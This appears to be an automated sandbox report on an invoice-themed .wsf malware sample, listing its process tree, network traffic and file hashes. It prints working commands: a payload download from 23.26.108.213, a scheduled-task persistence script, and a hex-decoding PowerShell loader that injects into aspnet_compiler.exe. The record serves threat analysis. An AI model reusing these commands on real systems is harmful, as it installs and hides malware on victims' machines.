C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.getwemail.io | udp |
| US | 172.67.201.26:443 | api.getwemail.io | tcp |
| US | 172.67.201.26:443 | api.getwemail.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | gdgosogbo.com | udp |
| US | 66.29.153.196:443 | gdgosogbo.com | tcp |
| US | 8.8.8.8:53 | 26.201.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 196.153.29.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.185.200.23.in-addr.arpa | udp |
| US | 23.26.108.213:222 | 23.26.108.213 | tcp |
| US | 8.8.8.8:53 | 213.108.26.23.in-addr.arpa | udp |
| US | 23.26.108.213:222 | 23.26.108.213 | tcp |
| US | 8.8.8.8:53 | www.autohotkey.com | udp |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 8.8.8.8:53 | 204.159.67.172.in-addr.arpa | udp |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 23.26.108.213:222 | 23.26.108.213 | tcp |
| US | 8.8.8.8:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 8.8.8.8:53 | fr31ndz.duckdns.org | udp |
| US | 23.26.108.213:7707 | fr31ndz.duckdns.org | tcp |
| US | 23.26.108.213:222 | fr31ndz.duckdns.org | tcp |
| US | 52.111.227.14:443 | tcp | |
| US | 172.67.159.204:443 | www.autohotkey.com | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a9c6361325231d94f5da1c10aaf64389 |
| SHA1 | 11c72105cff5d5c08b7a6985d0bc9a2ca454dbc1 |
| SHA256 | 89e95969c7a849dac0457205f033a8a6fe03fbe542098e5f34c2526aaf966079 |
| SHA512 | 285ce23be54b9a84bd6bd8462d91ccdfd78a8bd23cd61bfc9e11e40ed27a5674662e5d15866c7f318ec1251391c24cc9f6ffd2eba18a5b0c19af770367730f71 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 35099f5a0dea3a9e5e3f1e042da48f88 |
| SHA1 | 3997e136748c265e734c82b19cbbdb1bf52ecba4 |
| SHA256 | c54b4b60d27688545db2c4718e01342d29bd836fdc60f43671586bfbdcc0b68d |
| SHA512 | 2f58c8b49841b31dfa2d8035822834de36858fd7b1dab4780fcebe55346faa7c724580d8211ef56edf92802dde985d4dbb55ee9178a317a7f369c2af8e06a145 |
memory/4092-55-0x000001ED370B0000-0x000001ED370D2000-memory.dmp
memory/4092-58-0x000001ED4F780000-0x000001ED4F7F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsdhm5wo.elc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4092-135-0x000001ED370E0000-0x000001ED37102000-memory.dmp
memory/4092-174-0x000001ED4F740000-0x000001ED4F752000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | cdcc9f199b9e3268b059be1c0cf80d0f |
| SHA1 | 7508523cd3fbce1ecec39af5876cfe728f013c88 |
| SHA256 | 7a9a04ee141e8239b409942e7546b846b0e1d3030cc322799b91c0c80a7ae12b |
| SHA512 | 89eaa985a7c3edebde1612b045e0c95b2f8ea480325b333e83c192d0f52056544742d676ae5242637374eae12c45e3061fe67e2cb274a488a51120cca3ba254f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 935faa42939107f0a1382b588035c31d |
| SHA1 | d02c20eeaeb98f4715dbc63d6502593aa28fdd9d |
| SHA256 | 60604896355dfce3de4b8d5d318cc8dcfeb71a3b5aef69a88ad2fb8676379661 |
| SHA512 | 7eadd362f8fa54767a8cd38a60a86348c1a3530a185c9c466eac32aeee3554ab47de36df06aab3bb39874f6c43db0f101ea1b5256afdd4fd24ed0e305cb9fab6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57dacf.TMP
| MD5 | d1b2f573cedfe89db18eb406648b30ae |
| SHA1 | 2b842d2e247b0dab238f36df626c885ab7a0e6e9 |
| SHA256 | 6c651c97b325ba76aeff40259d3508385372f2fbb70827c3789e605de18b40e3 |
| SHA512 | 7551255e87dbe94385a1ed4379a667d79e38bad8f6ce331040bada68eaa376e99eef7b80d6226ceb91d5e5641f337a82a450d4cc57fdf6c4f7a2b635369cbc8f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OHP8MVFQ\vb[1].txt
| MD5 | 15674634b70ae2a7a7089e39fa0f7e17 |
| SHA1 | 0fb3e5d4ccda5862f76c428aa633ce5adae09959 |
| SHA256 | 2e8f43983d4e2dbb66f792c4dc38ab0848e43ae414a22bc9f3d498c9ab19c148 |
| SHA512 | 374c43ca66e0dcb4c2bf93d6134904d323b23c9c8f7a8991253c754ad8046349abc500d7d450f2814a1a7d5d220f3060a9799010f990a53281a1d8322d167f6f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb0fac3c8ec0783e07e40c31c99c9bb9 |
| SHA1 | aaf578891080c383f488505e070e9505b6c01b19 |
| SHA256 | 8ab4d1bbe88706c5af34d2501f8ce83506c14bac752f211185a27af4d55b83f7 |
| SHA512 | 3d3c690b55f1679771482a2f25c23bce4881c6335c53216fb217e18a61729d8738a719a2aa3ef8730af186986257a239092de744dc28eb583bd195230af5a85b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f2108c6102695c98776af4054746d5fe |
| SHA1 | d3cf36e2811d16166a4d7c1fd57092aeea3e70ee |
| SHA256 | 0b05f88ebf4574ba03e74ab24a6a7ecfa4d0e0efc97333b5025d9029898d0e6b |
| SHA512 | 25339dc69e4ac52167e28bca77fa5c7a521866c004711213cae199b8b81341bafce0aa250b70021d81fb4459db7cf0d2d1f39d1b48018dcc1d1124ae08439de8 |
memory/3472-390-0x0000019C3E020000-0x0000019C3E02A000-memory.dmp
memory/3472-377-0x0000019C3E040000-0x0000019C3E052000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 49284e913a442a1f5abb01fb8908b882 |
| SHA1 | 1da4ca65a9865d63d8179f3b892239e71d09fe69 |
| SHA256 | 9a411b496aaf3e3a2aac97a8d123bd89e28add3233f906a64c6e613fca9ee522 |
| SHA512 | f661a40cdf6191d5eb94212b9aad5a01d10307dbfbc2c6ca46e26967783590c0a887ae6759c716fdfaa4e7586155485c252d63658f96c41f4bf66170769120d2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4195abb0ed4482cfa6b989df29cca400 |
| SHA1 | 79de7f14cb478e4e45d45b091cad67f4f7c19f7a |
| SHA256 | 720544fa9ea94a850db97e5ec154122e92baef7742d1527f52639b1e4d07162e |
| SHA512 | 02b8f9a82ad7eb116e89b4d52b23d9e1c1491190a65bba434f0a57aae38285e7bc551bc3d184c194750d848e8133fbb6a08c4dbac6bea839812051f6367b5154 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ae1d9a4be62f0180efdfa7d914c68c2 |
| SHA1 | 9f94dc1d1c21fe541fa0393de58609da569fa56d |
| SHA256 | 92e06c329e0edb1caab8301bc25587c83cdad4cd2bac2867a118216f587c2227 |
| SHA512 | 4914d38c284294eaeaa58638b5f9bcee8a33a314d85520364c4abfe2ac10fac3a659d1811f606d4d6cf897fdcebfa4a761f92b60a8f68dea02033b5f166a1d64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8fe79d896819eadd2f3e1e6276908faa |
| SHA1 | 30a6867b9671b23e56e05a884029742a9d7e220b |
| SHA256 | 403187ae805e9c1acfb561d1e0ebfa697cbd848470785e10970994016a8e38f1 |
| SHA512 | bf9c8d21a274241179d349cd35cf4293d9e914d16a0386980eb1508629a3397f773ce2c59500fdef66fe377fce0b0e29b1f2910535fcf0115fc4394bae4ec1ac |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f0d0dbade46b6ae98c878f449f3c2d85 |
| SHA1 | 2587ef82fe9ae580e773a1255014297249fbbac2 |
| SHA256 | 0462afe1dffb3e21cc3821fe3b92249f19db7dc51267aed93f7b83e5847760ca |
| SHA512 | ecb6e074e8622b51770b1811c85d0afaf3330ce8ec2fad66fe63065ed56891f514a5a62891e2ee677a7d8c66ff7bf78456c3414ab97d7d92965dc2d18002ca21 |
C:\Users\Public\Auto.vbs
| MD5 | a5b25c095336368b68172d0eec88069e |
| SHA1 | 47b0b0a229e14d2125feb81c5168a7cf83b04fd1 |
| SHA256 | 47d7c3b0b2b75fabf29d3b17fa4fa9d0290b26aa5d79ecb875075930e8320a5d |
| SHA512 | c3f49848734b04d7863e1dca88a000b30e41dcbebb2867046e5957e52b93e7cb49cf4f235fb58bd698aa9a2831af5570bdfa4b44d37d7f86e66d577c0f3b29cf |
C:\Users\Public\node.bat
